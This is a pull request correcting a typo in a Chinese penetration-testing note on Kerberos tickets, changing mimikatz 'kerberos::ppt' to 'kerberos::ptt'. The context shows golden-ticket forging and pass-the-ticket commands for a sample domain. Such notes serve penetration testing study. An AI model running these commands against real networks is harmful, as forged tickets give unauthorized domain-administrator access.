### PR TITLE
修正域渗透-Ticket.md文件中的参数错误

### DIFF
--- a/Notes/域渗透-Ticket.md
+++ b/Notes/域渗透-Ticket.md
@@ -58,7 +58,7 @@ kerberos::golden /admin:administrator /domain:0day.org /sid:S-1-5-21-1812960810-
 
 ```
 kerberos::purge
-kerberos::ppt golden.kiribi
+kerberos::ptt golden.kiribi
 kerberos::list
 ```
 


### PR DESCRIPTION
kerberos::ppt golden.kiribi
改为
kerberos::ptt golden.kiribi
